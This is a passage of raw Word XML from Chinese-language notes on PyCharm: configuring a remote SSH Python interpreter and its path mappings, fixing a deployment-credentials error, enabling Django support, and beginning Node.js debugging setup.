        <w:t xml:space="preserve">        avd_url(str): avd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>漏洞的链接地址</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        session(requests.Session): </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>用于网络</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>IO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>session</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    Returns:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        res(dict): </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>返回无键默认</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>None</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>的字典</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        """</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C5F3F1" w14:textId="77777777" w:rsidR="0081769F" w:rsidRPr="000B4BD6" w:rsidRDefault="0081769F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3407A397" w14:textId="77777777" w:rsidR="0081769F" w:rsidRDefault="0081769F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1229A5D9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="840" w:name="_Toc159780260"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>正确的增加远程</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>python</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>解释器</w:t>
      </w:r>
      <w:bookmarkEnd w:id="840"/>
    </w:p>
    <w:p w14:paraId="3523AD99" w14:textId="77777777" w:rsidR="00DD5718" w:rsidRDefault="00DD5718" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>总结：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2988CFE8" w14:textId="6756F871" w:rsidR="00DD5718" w:rsidRDefault="00DD5718" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>解释器中的上传目录通常是默认传到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>tmp/pycharmxxxx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中，这个无所谓，改为正确的上传路径即可。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="442AB8CE" w14:textId="48690513" w:rsidR="00DD5718" w:rsidRDefault="00DD5718" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>部署</w:t>
      </w:r>
      <w:r>
        <w:t>`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>改成正确的上传路径</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FF48589" w14:textId="66595439" w:rsidR="00DD5718" w:rsidRDefault="00DD5718" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>.`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>解释器</w:t>
      </w:r>
      <w:r>
        <w:t>`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中的路径映射写对，就可以远程调试了。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50AF3804" w14:textId="77777777" w:rsidR="00DD5718" w:rsidRDefault="00DD5718" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62CC4302" w14:textId="0E85F593" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> -&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>项目</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> -&gt; python</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>解释器</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE92F66" w14:textId="61B824F1" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="489DECE2" wp14:editId="6D957EE1">
            <wp:extent cx="4076065" cy="2406015"/>
            <wp:effectExtent l="0" t="0" r="8255" b="19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95"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4076065" cy="2406015"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FCC37B0" w14:textId="706E2A43" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="1B316358" wp14:editId="50BCE622">
            <wp:extent cx="3907155" cy="2184400"/>
            <wp:effectExtent l="0" t="0" r="9525" b="1016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96"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3907155" cy="2184400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D582EB8" w14:textId="31E7826A" w:rsidR="00FA01F9" w:rsidRDefault="00FA01F9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里可以改为正确的路径，不一定非得下面的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">/tmp </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>路径</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="063175AF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="79D584E8" wp14:editId="0F58C154">
            <wp:extent cx="4187190" cy="2447925"/>
            <wp:effectExtent l="0" t="0" r="3810" b="571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97"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4187190" cy="2447925"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="76203291" w14:textId="6609E87E" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>映射路径选择本地路径就可以。如果解释器的映射路径不对，那回到上图改一下，再到这里选择正确的本地路径就可以进行远程调试了。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B1AD40D" w14:textId="4A8D78EE" w:rsidR="003E4E75" w:rsidRDefault="003E4E75" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>解释器中的路径映射填写正确，就可以正常进行远程调试了。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="009395C2" w14:textId="04468340" w:rsidR="00FA01F9" w:rsidRDefault="003E4E75" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0F7123D2" wp14:editId="2E6F70C8">
            <wp:extent cx="5274310" cy="3249930"/>
            <wp:effectExtent l="0" t="0" r="254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3249930"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2025D284" w14:textId="77777777" w:rsidR="003E4E75" w:rsidRDefault="003E4E75" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29F9AF80" w14:textId="38DC1078" w:rsidR="0073426C" w:rsidRDefault="0073426C" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="841" w:name="_Toc159780261"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>坑点：</w:t>
      </w:r>
      <w:r w:rsidRPr="0073426C">
        <w:t>Pycharm:Can't get remote credentials for deployment server</w:t>
      </w:r>
      <w:bookmarkEnd w:id="841"/>
    </w:p>
    <w:p w14:paraId="5A309934" w14:textId="77777777" w:rsidR="0073426C" w:rsidRDefault="0073426C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BEF37A7" w14:textId="2BB93FB3" w:rsidR="0073426C" w:rsidRPr="0073426C" w:rsidRDefault="0073426C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不知道为啥我会遇到这个报错，去项目，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>python</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>解释器，把现有的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SSH</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>解释器删除了，重新添加，就没问题了</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13132B51" w14:textId="77777777" w:rsidR="0073426C" w:rsidRDefault="0073426C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3505913F" w14:textId="77777777" w:rsidR="0073426C" w:rsidRDefault="0073426C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A1CC423" w14:textId="08B8E0C1" w:rsidR="00873F30" w:rsidRDefault="00873F30" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="842" w:name="_Toc159780262"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将项目启用为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>django</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>支持</w:t>
      </w:r>
      <w:bookmarkEnd w:id="842"/>
    </w:p>
    <w:p w14:paraId="6C47E678" w14:textId="4F3DF0F9" w:rsidR="00873F30" w:rsidRDefault="00873F30" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>首先启用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>django</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>支持，在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语言和框架</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Django</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>勾选“启用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Django</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>支持”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F2D08AC" w14:textId="0894DD84" w:rsidR="00873F30" w:rsidRPr="00873F30" w:rsidRDefault="00873F30" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>配置如下</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D1A499" w14:textId="6D48F7C2" w:rsidR="00873F30" w:rsidRDefault="00873F30" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2355CA16" wp14:editId="3783C430">
            <wp:extent cx="5274310" cy="3370580"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1270"/>
            <wp:docPr id="1740338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38837" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId299"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="3370580"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ADEE341" w14:textId="1AF29F6F" w:rsidR="00873F30" w:rsidRDefault="00873F30" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后要运行，就点击调试配置器</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A52EB20" w14:textId="5D79D0E2" w:rsidR="00873F30" w:rsidRDefault="00873F30" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="254F4459" wp14:editId="22151E73">
            <wp:extent cx="5274310" cy="3186430"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="598562444" name="图片 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62444" name="图片 1" descr="电脑萤幕的截图&#10;&#10;描述已自动生成"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId300"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="3186430"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BED7C82" w14:textId="042743D8" w:rsidR="00873F30" w:rsidRPr="00873F30" w:rsidRDefault="00873F30" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>直接配置后，运行即可</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E82845" w14:textId="77777777" w:rsidR="00873F30" w:rsidRDefault="00873F30" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="463E8B68" w14:textId="77777777" w:rsidR="00873F30" w:rsidRDefault="00873F30" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1575E03F" w14:textId="3ACF523C" w:rsidR="00A52B6E" w:rsidRDefault="00A52B6E" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="843" w:name="_Toc159780263"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>调试</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JS</w:t>
      </w:r>
      <w:r w:rsidR="0026586A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="0026586A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>javascript</w:t>
      </w:r>
      <w:r w:rsidR="0026586A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="0026586A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>nodejs</w:t>
      </w:r>
      <w:bookmarkEnd w:id="843"/>
    </w:p>
    <w:p w14:paraId="08E40187" w14:textId="77777777" w:rsidR="00A52B6E" w:rsidRDefault="00A52B6E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A7ACD89" w14:textId="714897A6" w:rsidR="0065362F" w:rsidRDefault="0065362F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>先</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Setting</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pl</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ugins </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装插件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> nodejs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="455518B6" w14:textId="09E92945" w:rsidR="0065362F" w:rsidRDefault="0065362F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>然后去</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语言和框架</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>node</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.js  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>配置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>node</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
